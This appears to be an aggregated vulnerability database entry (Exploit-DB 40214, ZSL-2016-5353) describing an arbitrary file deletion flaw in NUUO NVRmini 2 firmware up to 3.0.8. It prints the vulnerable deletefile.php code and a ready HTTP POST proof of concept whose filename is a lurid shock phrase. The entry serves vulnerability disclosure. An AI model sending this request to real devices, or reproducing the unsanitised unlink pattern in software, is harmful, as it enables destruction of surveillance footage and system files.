ID

VAR-E-201608-0131


EDB ID

40214


TITLE

NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 40214

DESCRIPTION

NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion.. webapps exploit for PHP platform

Trust: 0.6

sources: EXPLOIT-DB: 40214

AFFECTED PRODUCTS

vendor:nuuomodel:nvrminiscope:eqversion:23.0.8

Trust: 1.6

vendor:nuuomodel:arbitraryscope:eqversion:3.0.8

Trust: 0.5

sources: PACKETSTORM: 138225 // EXPLOIT-DB: 40214 // EDBNET: 87242

EXPLOIT


NUUO Arbitrary File Deletion Vulnerability

Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8

Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.

Desc: Input passed to the 'filename' parameter in 'deletefile.php' is not properly
sanitised before being used to delete files. This can be exploited to delete files
with the permissions of the web server using their absolute path or via directory
traversal sequences passed within the affected POST/GET parameter.

==================================================================
/deletefile.php:
----------------

1: <?php
2: $filename=$_POST['filename'];
3: unlink($filename);
4: if (file_exists($filename))
5: echo "fail";
6: else echo "true";
7: ?>

==================================================================

Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2016-5353
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5353.php

14.01.2016

--

POST /deletefile.php HTTP/1.1
Host: 10.0.0.17
Content-Length: x
Origin: http://10.0.0.17
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close

filename=He_molested_murdered_and_mutilated_her.mp4

Trust: 1.0

sources: EXPLOIT-DB: 40214

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 40214

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 40214

TYPE

Arbitrary File Deletion

Trust: 1.6

sources: EXPLOIT-DB: 40214 // EDBNET: 87242

TAGS

tag:exploit

Trust: 0.5

tag:arbitrary

Trust: 0.5

sources: PACKETSTORM: 138225

CREDITS

LiquidWorm

Trust: 0.6

sources: EXPLOIT-DB: 40214

EXTERNAL IDS

db:ZSLid:ZSL-2016-5353

Trust: 2.7

db:EXPLOIT-DBid:40214

Trust: 1.6

db:EDBNETid:87253

Trust: 0.6

db:EDBNETid:87242

Trust: 0.6

db:PACKETSTORMid:138225

Trust: 0.5

sources: PACKETSTORM: 138225 // EXPLOIT-DB: 40214 // EDBNET: 87253 // EDBNET: 87242

REFERENCES

url:http://www.zeroscience.mk/en/vulnerabilities/zsl-2016-5353.php

Trust: 1.0

url:https://www.intelligentexploit.com

Trust: 0.6

url:https://www.exploit-db.com/exploits/40214/

Trust: 0.6

sources: EXPLOIT-DB: 40214 // EDBNET: 87253 // EDBNET: 87242

SOURCES

db:PACKETSTORMid:138225
db:EXPLOIT-DBid:40214
db:EDBNETid:87253
db:EDBNETid:87242

LAST UPDATE DATE

2022-07-27T10:02:57.890000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:138225date:2016-08-06T19:09:20
db:EXPLOIT-DBid:40214date:2016-08-06T00:00:00
db:EDBNETid:87253date:2016-08-07T00:00:00
db:EDBNETid:87242date:2016-08-07T00:00:00